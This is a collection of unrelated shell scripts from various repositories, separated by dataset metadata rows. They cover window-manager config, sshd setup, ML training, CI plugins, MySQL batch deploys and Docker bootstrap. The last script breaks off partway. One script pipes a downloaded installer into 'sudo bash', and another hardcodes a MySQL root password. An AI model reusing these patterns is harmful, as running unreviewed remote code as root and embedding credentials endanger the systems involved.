yabai -m rule --add app=".*" manage=off
# yabai -m rule --add app="^System Preferences$" manage=off
# yabai -m rule --add app="^Safari$" title="^(General|(Tab|Password|Website|Extension)s|AutoFill|Se(arch|curity)|Privacy|Advance)$" manage=off
# yabai -m rule --add app="^App Store$" manage=off
# yabai -m rule --add app="^Activity Monitor$" manage=off
# yabai -m rule --add app="^KakaoTalk$" manage=off
# yabai -m rule --add app="^Movist$" manage=off
# yabai -m rule --add app="QuickTime Player" manage=off
# yabai -m rule --add app="Transmission" manage=off
# yabai -m rule --add app="Alfred Preferences" manage=off
# yabai -m rule --add app="Dictionary" manage=off
# yabai -m rule --add app="^Calculator$" manage=off
# yabai -m rule --add app="Finder" manage=off
# yabai -m rule --add app="Window 10" space=3
# yabai -m rule --add app="CleanMyMac X" manage=off
# yabai -m rule --add app="Keka" manage=off
# yabai -m rule --add app="Stats" manage=off
# yabai -m rule --add app="Bartender" manage=off
# yabai -m rule --add title='Preferences$' manage=off topmost=on
# # https://github.com/koekeishiya/yabai/issues/322
# yabai -m signal --add event=window_created action='yabai -m query --windows --window $YABAI_WINDOW_ID | jq -er ".resizable == 0 and .floating == 0" && yabai -m window $YABAI_WINDOW_ID --toggle float'
# Forward window events to sketchybar so the bar can refresh its title.
yabai -m signal --add event=window_title_changed action="sketchybar --trigger window_title_changed"
yabai -m signal --add event=window_focused action="sketchybar --trigger window_focused"
echo "yabai configuration loaded.."
| true
|
908b9fc21bba98881143f3aa0583e2ee0c5b23fb
|
Shell
|
aws/aws-ec2-instance-connect-config
|
/debian/postinst
|
UTF-8
| 2,087
| 3.65625
| 4
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
#!/bin/sh
set -e
#DEBHELPER#
case "$1" in
configure)
# systemd drop-in that rewires sshd's AuthorizedKeysCommand to the
# EC2 Instance Connect helper. %% escapes % for systemd unit syntax.
EXEC_OVERRIDE='ExecStart=/usr/sbin/sshd -D -o "AuthorizedKeysCommand /usr/share/ec2-instance-connect/eic_run_authorized_keys %%u %%f" -o "AuthorizedKeysCommandUser ec2-instance-connect" $SSHD_OPTS'
# Shell-style flag: 0 = we wrote an override, 1 = we did not.
modified=1
# If there is nothing in the AuthorizedKeysCommand field of sshd_config *and* nothing in any sshd override, add our config
if ! grep -q '^[^#]*AuthorizedKeysCommand[[:blank:]]\+.*$' /etc/ssh/sshd_config ; then
if ! grep -q '^[^#]*AuthorizedKeysCommandUser[[:blank:]]\+.*$' /etc/ssh/sshd_config ; then
if ! grep -q '^[^#]*AuthorizedKeysCommandRunAs[[:blank:]]\+.*$' /etc/ssh/sshd_config ; then
# If systemd unit contains AKC don't override it
if ! grep -q "AuthorizedKeysCommand" /lib/systemd/system/ssh.service ; then
can_modify=1
if [ -d /lib/systemd/system/ssh.service.d ] ; then
# If *any* override contains an ExecStart, don't override it
if ! grep -Rq "ExecStart" /lib/systemd/system/ssh.service.d/ ; then
can_modify=0
fi
else
# Or there are no overrides
mkdir /lib/systemd/system/ssh.service.d
can_modify=0
fi
if [ $can_modify -eq 0 ] ; then
# Add our configuration
printf "%s\n%s\n%s\n" "[Service]" "ExecStart=" "${EXEC_OVERRIDE}" > /lib/systemd/system/ssh.service.d/ec2-instance-connect.conf
modified=0
fi
fi
fi
fi
fi
# Reload + restart sshd only when an override was actually written.
if [ $modified -eq 0 ] ; then
systemctl daemon-reload
echo "sshd override added, restarting daemon"
deb-systemd-invoke restart ssh.service
fi
;;
esac
| true
|
a4029996804bb70272dbff3576ca52c670e32e0f
|
Shell
|
allenai/zest
|
/bin/train_bart_run_eval.sh
|
UTF-8
| 1,652
| 2.65625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# ./bin/train_bart_run_eval.sh /path/to/zest/data learning_rate num_epochs
# Fine-tunes facebook/bart-large on the zest task, generates dev-set
# predictions, then runs the official evaluation script on them.
DATADIR=$1
shift;
LR=$1
shift;
EPOCHS=$1
# NOTE(review): `conda activate` requires a conda-initialised shell; in a
# non-interactive shell this may need `source .../conda.sh` first — confirm.
conda activate zest_bart
OUTDIR=bart_large_${LR}_${EPOCHS}epochs_smoothing0.1
echo "TRAINING $LR $EPOCHS $OUTDIR"
python bin/fine_tune_bart.py \
    --task=zest \
    --data_dir=$DATADIR \
    --model_name_or_path=facebook/bart-large \
    --learning_rate=$LR \
    --train_batch_size=8 \
    --gradient_accumulation_steps=4 \
    --accumulate_grad_batches=4 \
    --eval_batch_size=1 \
    --num_train_epochs=$EPOCHS \
    --check_val_every_n_epoch=100 \
    --warmup_steps=100 \
    --gpus=1 \
    --do_train \
    --do_predict \
    --early_stopping_patience=-1 \
    --max_grad_norm=0.1 \
    --gradient_clip_val=0.1 \
    --fp16 \
    --fp16_opt_level=O2 \
    --weight_decay=0.01 \
    --adam_epsilon=1e-8 \
    --lr_scheduler=linear \
    --dropout=0.1 \
    --attention_dropout=0.1 \
    --max_source_length=512 \
    --max_target_length=64 \
    --val_max_target_length=64 \
    --test_max_target_length=64 \
    --eval_beams 4 \
    --eval_max_gen_length=64 \
    --row_log_interval=320 \
    --num_sanity_val_steps=0 \
    --n_val -1 \
    --freeze_embeds \
    --output_dir=$OUTDIR \
    --label_smoothing 0.1
# This evaluates on the dev set and writes the predictions to a file.
python bin/fine_tune_bart.py \
    --evaluate_only \
    --output_dir=$OUTDIR \
    --model_name_or_path ignore --data_dir ignore
# Run the official eval script.
python bin/evaluate-zest.py \
    --predictions-path $OUTDIR/val_preds.txt \
    --dev-path $DATADIR/dev.jsonl \
    --output-path $OUTDIR/val_preds_results_
| true
|
6f0af5959486d0bd7250916691d0976eb6794829
|
Shell
|
h2kfl/TAOS-CI
|
/ci/taos/config/config-plugins-audit.sh
|
UTF-8
| 3,622
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
##
# Copyright (c) 2018 Samsung Electronics Co., Ltd. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##
# @file config-plugins-audit.sh
# @brief Configuraiton file to maintain audit modules (after completing a build procedure)
# @see https://github.com/nnsuite/TAOS-CI
# @author Geunsik Lim <geunsik.lim@samsung.com>
##### Set environment for audit plugins
# -i makes idx an integer; ++idx below pre-increments it per registered plugin.
declare -i idx=-1
###### plugins-base ###############################################################################################
echo "[MODULE] plugins-base: Plugin group is a well-maintained collection of plugin modules."
# Please append your plugin modules here.
audit_plugins[++idx]="pr-audit-build-tizen"
echo "[DEBUG] The default BUILD_MODE of ${audit_plugins[idx]} is declared with 99 (SKIP MODE) by default in plugins-base folder."
echo "[DEBUG] ${audit_plugins[idx]} is started."
echo "[DEBUG] TAOS/${audit_plugins[idx]}: Check if Tizen rpm package is successfully generated."
echo "[DEBUG] Current path: $(pwd)."
source ${REFERENCE_REPOSITORY}/ci/taos/plugins-base/${audit_plugins[idx]}.sh
audit_plugins[++idx]="pr-audit-build-ubuntu"
echo "[DEBUG] The default BUILD_MODE of ${audit_plugins[idx]} is declared with 99 (SKIP MODE) by default in plugins-base folder."
echo "[DEBUG] ${audit_plugins[idx]} is started."
echo "[DEBUG] TAOS/${audit_plugins[idx]}: Check if Ubuntu deb package is successfully generated."
echo "[DEBUG] Current path: $(pwd)."
source ${REFERENCE_REPOSITORY}/ci/taos/plugins-base/${audit_plugins[idx]}.sh
audit_plugins[++idx]="pr-audit-build-yocto"
echo "[DEBUG] The default BUILD_MODE of ${audit_plugins[idx]} is declared with 99 (SKIP MODE) by default in plugins-base folder."
echo "[DEBUG] ${audit_plugins[idx]} is started."
# NOTE(review): this message says "deb" for the Yocto build — likely a
# copy/paste from the Ubuntu stanza; confirm the intended wording.
echo "[DEBUG] TAOS/${audit_plugins[idx]}: Check if YOCTO deb package is successfully generated."
echo "[DEBUG] Current path: $(pwd)."
source ${REFERENCE_REPOSITORY}/ci/taos/plugins-base/${audit_plugins[idx]}.sh
###### plugins-good ###############################################################################################
echo "[MODULE] plugins-good: Plugin group that follow Apache license with good quality"
# Please append your plugin modules here.
###### plugins-staging ################################################################################################
echo "[MODULE] plugins-staging: Plugin group that does not have evaluation and aging test enough"
# Please append your plugin modules here.
# module_name="pr-audit-resource"
# echo "[DEBUG] $module_name is started."
# echo "[DEBUG] TAOS/$module_name: Check if there are not-installed resource files."
# echo "[DEBUG] Current path: $(pwd)."
# source ${REFERENCE_REPOSITORY}/ci/taos/plugins-staging/$module_name.sh
# $module_name
# echo "[DEBUG] $module_name is done."
# audit_plugins[++idx]="pr-audit-nnstreamer-ubuntu-apptest"
# echo "[DEBUG] TAOS/${audit_plugins[idx]}: Check nnstreamer sample app"
# echo "[DEBUG] ${audit_plugins[idx]} is started."
# echo "[DEBUG] Current path: $(pwd)."
# source ${REFERENCE_REPOSITORY}/ci/taos/plugins-staging/${audit_plugins[idx]}.sh
| true
|
a1a69ba491bc07ea4dc8a4de0c04bf82c8efcd27
|
Shell
|
containers/automation
|
/common/test/console_output_test_helper.sh
|
UTF-8
| 690
| 3.1875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This helper script is intended for testing several functions
# which output calling context. It is intended to only be used
# by the console-output unit-tests. They are senitive to
# the both line-positions and line-content of all the following.
SCRIPT_DIRPATH=$(dirname "${BASH_SOURCE[0]}")  # directory containing this helper
AUTOMATION_LIB_PATH=$(realpath "$SCRIPT_DIRPATH/../lib")
source "$AUTOMATION_LIB_PATH/common_lib.sh"  # provides dbg/warn/msg/die used below
set +e  # keep running even if the calls below return non-zero
test_function() {  # same four calls, but from inside a function (different caller context)
A_DEBUG=1 dbg "Test dbg message"
warn "Test warning message"
msg "Test msg message"
die "Test die message" 0
}
A_DEBUG=1 dbg "Test dbg message"
warn "Test warning message"
msg "Test msg message"
die "Test die message" 0
test_function
| true
|
ede5f7ef76850f73fcbf66f604d06797a64e54f6
|
Shell
|
UbikZ/dockerz
|
/convert/entrypoint.sh
|
UTF-8
| 346
| 3.625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Container entrypoint wrapping ImageMagick's `convert`.
# NOTE(review): the cd into the ffmpeg workspace is unchecked — confirm the
# directory exists in the image.
cd /home/workspace/ffmpeg
# Print usage help to stdout and exit with status 1.
function usage() {
    cat <<'EOF'
 usage: convert <options>

 -v show versions.
 -h show usage.
EOF
    exit 1
}
# Dispatch: -v prints the tool version, -h prints usage, anything else is
# passed straight through to ImageMagick's convert.
case "$1" in
-v) (
echo "imageMagick : $(convert -version)"
) ;;
-h) usage ;;
*) convert "${@:1}" ;;
esac
| true
|
8c179532daf4f4554883cae6d205ffe8bff3b021
|
Shell
|
leon66666/ShellProgram
|
/dmlnew.sh
|
UTF-8
| 2,577
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
stty erase ^H
MYSQL_HOST30=127.0.0.1
MYSQL_HOST24=192.168.1.24
MYSQL_USER=root
PORT=3306
MYSQL_PASSWORD='password'
MYSQL_DATABASE30='26 27 28 29 31 32 33 34 35 36'
MYSQL_DATABASE24='hoomxb_anqi hoomxb_hehuanhuan hoomxb_liuyan hoomxb_luzongwei hoomxb_tianye hoomxb_wanghaiyang hoomxb_wanghuidong hoomxb_wangtongkai hoomxb_wangzhongqiu hoomxb_zhaoxiuhuan hoomxb_zhengdongwen'
SQL_INPUT=`cat /scripts/sql.txt`
SQL_INIT=`cat /scripts/init.txt`
echo -n -e "\e[32;1m》》请输入您要批量操作的数据库主机地址(24或者30):\e[0m"
read host
if [[ $host == '24' ]];then
for database in $MYSQL_DATABASE24
do
echo -e "\e[36;1m---$database\e[0m"
done
elif [[ $host == '30' ]];then
for database in $MYSQL_DATABASE30
do
echo -e "\e[31;1m---$database\e[0m"
done
fi
#----------------------------------------------------------------------------------------------
echo -n -e "\e[35;1m 》》请输入您要批量操作的数据库名称(提示:为空则部署全部数据库):\e[0m"
read db
case $host in
24)
if [ -z $db ]
then
for i in $MYSQL_DATABASE24
do
mysql -h${MYSQL_HOST24} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} ${i} -e "source /scripts/sql.txt"
mysql -h${MYSQL_HOST24} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} ${i} -e "source /scripts/init.txt"
done
else
mysql -h${MYSQL_HOST24} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} ${db} -e "source /scripts/sql.txt"
mysql -h${MYSQL_HOST24} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} ${db} -e "source /scripts/init.txt"
fi
;;
30)
if [ -z $db ]
then
for i in $MYSQL_DATABASE30
do
echo "192.168.1.${i}"
ssh -l hsadmin 192.168.1.${i} -C "source /etc/profile && /./scripts/kill_all.sh"
sleep 5
echo "hoomxb${i}"
mysql -h${MYSQL_HOST30} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} "hoomxb"${i} -e "source /scripts/sql.txt"
mysql -h${MYSQL_HOST30} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} "hoomxb"${i} -e "source /scripts/init.txt"
sleep 5
ssh -l hsadmin 192.168.1.${i} -C "source /etc/profile && /./scripts/start_and_init_all.sh"
done
else
echo "192.168.1.${db}"
ssh -l hsadmin 192.168.1.${db} -C "source /etc/profile && /./scripts/kill_all.sh"
sleep 5
echo "hoomxb${db}"
mysql -h${MYSQL_HOST30} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} "hoomxb"${db} -e "source /scripts/sql.txt"
mysql -h${MYSQL_HOST30} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} "hoomxb"${db} -e "source /scripts/init.txt"
sleep 5
ssh -l hsadmin 192.168.1.${db} -C "source /etc/profile && /./scripts/start_and_init_all.sh"
fi
;;
*)
echo "please input dababase_host and database_name!"
esac
| true
|
d97bc95c2973647a624aef7f285b0660e5d8d1e2
|
Shell
|
ciaranmcnulty/octopi
|
/power_switch.sh
|
UTF-8
| 275
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
# Control a network power plug over HTTP.
# Env: POWER_HOST, POWER_PORT, POWER_DEVICEID select the plug endpoint.
# Usage: power_switch.sh [on|off] — with no argument, exit 0 iff the relay
# reports state 1 (on) in its JSON reply.
URL="http://$POWER_HOST:$POWER_PORT/plugs/$POWER_DEVICEID"
case "$1" in
"on")
wget -qO - "$URL/on" > /dev/null
;;
"off")
wget -qO - "$URL/off" > /dev/null
;;
*)
# Query: grep's status becomes the script's exit code.
wget -qO - "$URL" | grep '"relay_state":1' > /dev/null
exit $?
;;
esac
| true
|
358573d8f4cd6d9bea2e338df5bca398919580a4
|
Shell
|
TheStrix/dotfiles
|
/bin/startgui
|
UTF-8
| 402
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Start whichever display-manager services are registered with the init
# system. The three original copy-pasted if-blocks are deduplicated into a
# loop; each candidate is checked and started in the same order as before.
for dm in sddm lightdm gdm; do
    # `service --status-all` lists known services; -F matches the literal name.
    if service --status-all | grep -Fq "$dm"; then
        sudo service "$dm" start
    fi
done
| true
|
f74cf0bb6dc91cee18e0aa19d5a849f2e4dbe346
|
Shell
|
SamJones1331/Personal-Project
|
/startup.sh
|
UTF-8
| 400
| 2.578125
| 3
|
[] |
no_license
|
# Bootstrap Docker on a fresh host, add the current user to the docker
# group, then log the user out so the new group membership takes effect.
sudo apt-get update
#curls the cript from a webpage and then passes it through bash
# NOTE(review): piping a remote script into `sudo bash` is a supply-chain
# risk — consider downloading, inspecting, then running it.
curl https://get.docker.com | sudo bash
sudo usermod -aG docker $(whoami)
echo "Preparing to log you out"
sleep 1
echo "Remember to log back in once the terminal closes"
sleep 1
echo "Logging you out in 3"
sleep 1
echo "Logging you out in 2"
sleep 1
echo "Logging you out in 1"
sleep 1
echo "Logging you out"
# NOTE(review): `logout` only works in a login shell; when this file is run
# as a script it will report "not login shell" — confirm it is sourced.
logout
| true
|
b1a0eb3d49ececb41e427f1dc7d439e5037973a1
|
Shell
|
sfazli96/CS166-Phase3
|
/lab6/lab5/startPostgreSQL.sh
|
UTF-8
| 458
| 3.328125
| 3
|
[] |
no_license
|
#! /bin/bash
# Set up and start a per-user scratch PostgreSQL instance under /tmp/$LOGNAME.
folder=/tmp/$LOGNAME
# BUG FIX: the original ran `echo folder`, printing the literal word
# "folder" instead of the working directory path.
echo "$folder"
#Clear Folder
rm -rf "$folder"
#Initialize folders
mkdir "$folder"
cd "$folder"
mkdir -p test/data
mkdir sockets
#Initialize the Database
export PGDATA=/tmp/$LOGNAME/test/data
sleep 1
#Initialize DB
initdb
sleep 1
#Starting Database
export PGPORT=5432
pg_ctl -o "-c unix_socket_directories=/tmp/$LOGNAME/sockets" -D $PGDATA -l /tmp/$LOGNAME/logfile start
sleep 1
#Checking of Database is running
pg_ctl status
|
aa1b7532b4aed8b5eed0b673f8cdb89d2e0fad2f
|
Shell
|
geta6/dotfiles
|
/bin/setup-os
|
UTF-8
| 2,628
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/zsh
set -eu
BASE_DIR=$(dirname $(cd $(dirname $0); pwd))
if [[ "$OSTYPE" == "darwin"* ]]; then
  #==============================#
  echo "--> setup macOS settings"
  #==============================#
  [[ ! -d ~/Developer ]] && mkdir ~/Developer
  [[ ! -d ~/Sites ]] && mkdir ~/Sites
  cp -f ${BASE_DIR}/lib/com.apple.dock.plist ~/Library/Preferences/com.apple.dock.plist
  killall Dock
  cp -f ${BASE_DIR}/lib/com.apple.finder.plist ~/Library/Preferences/com.apple.finder.plist
  killall Finder
  if [[ -x `which plutil` ]]; then
    if [[ -z "$(plutil -extract 'Default Window Settings' xml1 ~/Library/Preferences/com.apple.Terminal.plist -o - | grep Dracula)" ]]; then
      open ${BASE_DIR}/lib/Dracula.terminal
    fi
  fi
  #==============================#
  echo "--> setup homebrew"
  #==============================#
  if [[ ! -x "`which brew`" ]]; then
    /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
    eval "$(/opt/homebrew/bin/brew shellenv)"
  fi
  brew tap homebrew/cask-fonts
  brew install \
    binutils \
    coreutils \
    diffutils \
    direnv \
    ffmpeg \
    findutils \
    gifsicle \
    git \
    grep \
    handbrake \
    htop \
    hub \
    imagemagick \
    mas \
    moreutils \
    neovim \
    readline \
    redis \
    the_silver_searcher \
    tig \
    tmux \
    unar \
    yarn \
    z
  brew install --cask \
    ankerwork \
    appcleaner \
    authy \
    discord \
    figma \
    fliqlo \
    font-hack-nerd-font \
    google-chrome \
    gyazo \
    launchbar \
    ngrok \
    notion \
    rectangle-pro \
    skitch \
    slack \
    spotify \
    the-unarchiver \
    transmit \
    visual-studio-code \
    webcatalog
  #==============================#
  echo "--> setup AppStore"
  #==============================#
  mas install \
    955848755 $(: 'Theine' \ )\
    549083868 $(: 'Display Menu' \ )\
    1532419400 $(: 'MeetingBar' \ )\
    539883307 $(: 'LINE' \ )\
    1352778147 $(: 'Bitwarden' \ )\
    409183694 $(: 'Keynote' \ )\
    409201541 $(: 'Pages' \ )\
    409203825 $(: 'Numbers' \ )\
    497799835 $(: 'Xcode' \ )
# BUG FIX: the original wrote `else if [[ ... ]]; then`, which opens a
# NESTED if inside the else branch; the single closing `fi` below then
# leaves the outer if unterminated — a parse error at end of file, so the
# script could never run. `elif` is the correct construct here.
elif [[ "$OSTYPE" == "linux-gnu" ]]; then
  #==============================#
  echo "--> setup linux settings"
  #==============================#
  curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add -
  echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list
  sudo apt install \
    direnv \
    hub \
    htop \
    neovim \
    tig \
    tmux \
    yarn
else
  echo 'Not compatible'
  exit 1
fi
| true
|
060994f607273680985db30bc0f627a4cad2bf63
|
Shell
|
Jacquimo/cs352-projects
|
/project1/p1_tests_updated/tests.sh
|
UTF-8
| 620
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash
# Run ./parser against every file in ./tests (expected to parse cleanly)
# and ./tests2 (expected to produce a syntax error), color-coding results.
# BUG FIX: the original began with `PATH=./tests/`, clobbering the shell's
# command search path for the whole run; the variable was never used (the
# globs below do the work), so it is removed. Backticks also modernized
# to $( ).
FILES=./tests/*
BFILES=./tests2/*
ERROR="Syntax error"
echo -e "\033[1;4mTesting valid syntaxes:\033[0m"
for f in $FILES
do
echo "Running $f:"
OUTPUT=$(./parser $f)
if [[ $OUTPUT =~ $ERROR ]]; then
echo -e "\033[1;31mTest Failed\033[0m"
echo "$OUTPUT"
else
echo -e "\033[1;32mTest Passed\033[0m"
fi
done
echo -e "\033[1;4mTesting for syntax error catching:\033[0m"
for f in $BFILES
do
echo "Running $f:"
OUTPUT=$(./parser $f)
if [[ $OUTPUT =~ $ERROR ]]; then
echo -e "\033[1;32mTest Passed\033[0m"
else
echo -e "\033[1;31mTest Failed\033[0m"
echo "$OUTPUT"
fi
done
| true
|
658a4d6c4db2fb13b612e33f8a3652fac94b7ef6
|
Shell
|
robin-vip/shell_scripts
|
/shell_scripts/remote_copy_files.sh
|
UTF-8
| 1,491
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/sh
# Function: Remote copy files via scp tools
# Author: Ward  write at 07/24/2014
# Version: v1.00(inital)
echo -e "##################################################################################"
echo -e "##################################################################################"
echo -e "#                   Remote copy files tools                                      #"
echo -e "#                   Versison: v1.00  07/24/2014                                  #"
echo -e "##################################################################################"
echo -e
# Prompt until we can ping the target host.
quit=n
while [ "$quit" != "y" ]
do
    read -ep " Please input target IP address(or hostname):" target_ip
    # Quote the user-supplied host so empty/space input cannot word-split.
    ping -c 4 "$target_ip" > /dev/null
    if test $? -ne 0; then
        echo -e " Target's IP or hostname is error"
    else
        quit=y
    fi
done
read -ep " Please input target machine's username:" username
read -ep " Please input source files path:" source_path
read -t 60 -ep " Please input files store path:" local_path
# Default to the current directory when the user times out / enters nothing.
if [ "$local_path" == "" ]; then
    local_path=./
fi
quit=n
while [ "$quit" != "y" ]
do
    quit=y
    # BUG FIX: the original prompt used unescaped inner double quotes
    # ("to" or "from"), which the shell consumed — the quotes never
    # appeared on screen. Escape them so the user sees "to"/"from".
    read -ep " Please input copy's direction(\"to\" or \"from\"):" direction
    case "$direction" in
        "to")
            scp -rv $local_path $username@$target_ip:$source_path
            ;;
        "from")
            scp -rv $username@$target_ip:$source_path $local_path
            ;;
        *)
            echo -e "Sorry, choice not recognized"
            quit=n
    esac
done
| true
|
921e25dec71fe141e37578288b3ac2df6c4612c4
|
Shell
|
cncf/devstats
|
/util_sh/current_company_repos.sh
|
UTF-8
| 423
| 3
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Usage guard: all four positional arguments are required
# (DB name, event types, company name(s), output CSV path).
if [ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ] || [ -z "$4" ]; then
  echo "$0: required DB name, event types, company name(s) and CSV file output, for example allprj \"'PushEvent', 'IssuesEvent'\" \"'ZTE', 'ZTE Corporation'\" output.csv"
  exit 1
fi
# Run the SQL through runq with CSV output; {{companies}}/{{event_types}}
# are template placeholders substituted from the following arguments.
GHA2DB_LOCAL=1 GHA2DB_SKIPTIME=1 GHA2DB_SKIPLOG=1 GHA2DB_CSVOUT="$4" PG_DB="$1" runq ./util_sql/company_repo_names.sql {{companies}} "$3" {{event_types}} "$2"
| true
|
c016c361c52dff7e44a4505142e2cadb556ab55d
|
Shell
|
SKA-ScienceDataProcessor/integration-prototype
|
/sip/tango_control/flask_master/util/mkstate
|
UTF-8
| 554
| 3.96875
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Command line utility to create a new SDP State.
# Uses jq.
# Emits JSON of the form {"value":"<state>"}; default state is "on".
myname=${0##*/}
while getopts cds10?h name
do
case $name in
# -c: compact, monochrome jq output; jqOpt stays unset otherwise, and the
# deliberately unquoted ${jqOpt} below then expands to no argument at all.
c) jqOpt="-cM" ;;
d) state=disable ;;
s) state=standby ;;
0) state=off ;;
1) state=on ;;
\?|h) printf "Usage: %s: -0 | -1 | -s | -d \n" $myname
printf " for off, on, standby and disable respectively\n"
printf " (default on)\n"
printf " Use -c to compact output.\n"
exit 2;;
esac
done
jq ${jqOpt} -n --arg state ${state:-on} '{"value":$state}'
| true
|
8ae3c88af0f684e7295a496ed2bd8cae2abec683
|
Shell
|
rekirt/shell
|
/bookdemo/chapter16/test8.sh
|
UTF-8
| 232
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
# Demonstrates global vs. local variables:
# a variable assigned inside a function is global by default;
# `local` would make it private (function-local) instead.
function db1 {
value=$[ $value * 2 ]
}
read -p "Enter a value:" value
db1
echo "the new value is $value"
| true
|
3dff9c26ac6435a8a0aa92457a618e58a9f08237
|
Shell
|
rockstar-project/continuous-delivery
|
/continuous-deployment/swarm/vb/setup.sh
|
UTF-8
| 1,903
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
# Provision a 4-node Docker Swarm (1 manager + 3 workers) on VirtualBox
# using docker-machine, then label the manager as the gateway node.
#
# Usage: ./setup.sh <stack-name>
#   $1 - stack name used to prefix all VM names (vb-<name>-swarm-*)
#
# Assumes docker-machine and VirtualBox are installed. There is no error
# checking, so a failed step leaves a partially-created cluster behind.
STACK_NAME=$1
SWARM_PORT=2377
# Create the docker swarm manager node first.
docker-machine create --driver virtualbox vb-${STACK_NAME}-swarm-manager
# Get the IP address of the manager node.
SWARM_MANAGER_IP=$(docker-machine ip vb-${STACK_NAME}-swarm-manager)
# Create the three worker nodes.
docker-machine create --driver virtualbox vb-${STACK_NAME}-swarm-worker1
docker-machine create --driver virtualbox vb-${STACK_NAME}-swarm-worker2
docker-machine create --driver virtualbox vb-${STACK_NAME}-swarm-worker3
# Get the IP address of the worker nodes.
SWARM_WORKER1_IP=$(docker-machine ip vb-${STACK_NAME}-swarm-worker1)
SWARM_WORKER2_IP=$(docker-machine ip vb-${STACK_NAME}-swarm-worker2)
SWARM_WORKER3_IP=$(docker-machine ip vb-${STACK_NAME}-swarm-worker3)
# Point your docker client to the swarm manager.
eval $(docker-machine env vb-${STACK_NAME}-swarm-manager)
# Initialize Swarm mode.
docker swarm init --advertise-addr ${SWARM_MANAGER_IP} --listen-addr ${SWARM_MANAGER_IP}:${SWARM_PORT}
# Worker join token for this swarm; consumed by the three joins below.
export TOKEN=$(docker swarm join-token -q worker)
# Point your docker client to the swarm worker1
eval $(docker-machine env vb-${STACK_NAME}-swarm-worker1)
docker swarm join --token $TOKEN --listen-addr ${SWARM_WORKER1_IP}:${SWARM_PORT} ${SWARM_MANAGER_IP}:${SWARM_PORT}
# Point your docker client to the swarm worker2
eval $(docker-machine env vb-${STACK_NAME}-swarm-worker2)
docker swarm join --token $TOKEN --listen-addr ${SWARM_WORKER2_IP}:${SWARM_PORT} ${SWARM_MANAGER_IP}:${SWARM_PORT}
# Point your docker client to the swarm worker3
eval $(docker-machine env vb-${STACK_NAME}-swarm-worker3)
docker swarm join --token $TOKEN --listen-addr ${SWARM_WORKER3_IP}:${SWARM_PORT} ${SWARM_MANAGER_IP}:${SWARM_PORT}
# Verify the cluster.
eval $(docker-machine env vb-${STACK_NAME}-swarm-manager)
docker node ls
# Tag the manager so services can be constrained to the gateway node.
docker node update --label-add type=gateway vb-${STACK_NAME}-swarm-manager
| true
|
bf21e70894c85fe4c6b456696c7e358ec5bef39e
|
Shell
|
cbosdo/my-media-center
|
/bin/vlc-wrapper
|
UTF-8
| 296
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/sh
# Wrap cvlc for playback requests: translate cdda:// URLs of the form
# cdda://local/NN.cdda into a --cdda-track option; reject anything else.
set -x
args=
url=$1
case "$url" in
cdda://*)
# Strip the path and leading zeros to get the bare track number.
track=$(echo "$url" | sed 's;cdda://local/0*\([0-9]\+\).cdda;\1;')
args="--cdda-track $track"
url="cdda://"
;;
*)
exit 1
;;
esac
# $args is intentionally unquoted so it splits into option + value;
# "$url" is quoted to keep it a single argument.
/usr/bin/cvlc --extraintf=rc --rc-host localhost:4321 --play-and-exit $args "$url"
| true
|
6dee36e208a5085ae251cae538ce326be72e58a8
|
Shell
|
dxw/rails-template
|
/script/all/process-script-args
|
UTF-8
| 416
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/sh
# Source this in a script to process standard arguments for it.
set -e
echo "==> Loading command line options..."
DOCKER=${PREFER_DOCKER_FOR_DXW_RAILS:-0}
# Consume leading --docker/--no-docker flags; leave remaining args in $@.
while [ "$#" -gt 0 ]
do
  case "$1" in
    --docker)
      DOCKER=1
      ;;
    --no-docker)
      # shellcheck disable=SC2034
      DOCKER=0
      ;;
    *)
      # Stop processing arguments so we pass them on
      break
      ;;
  esac
  shift
done
| true
|
e2f87e1b916fdd5be1d6eb61622f153aea1dca6b
|
Shell
|
yemin7/cis
|
/sce/etc_group_chk.sh
|
UTF-8
| 905
| 4
| 4
|
[] |
no_license
|
#!/usr/bin/env sh
# CIS-CAT Script Check Engine
#
# Name Date Description
# -------------------------------------------------------------------
# E. Pinnell 07/15/20 Check existence of /etc/passwd groups in /etc/group
#
passing=""
output=""
EPG=""
EGG=""
# EPG: group IDs referenced by users (field 4 of /etc/passwd).
# EGG: group IDs actually defined (field 3 of /etc/group).
# NOTE(review): uniq without sort only drops adjacent duplicates; harmless
# here since a duplicate GID merely causes a repeat check.
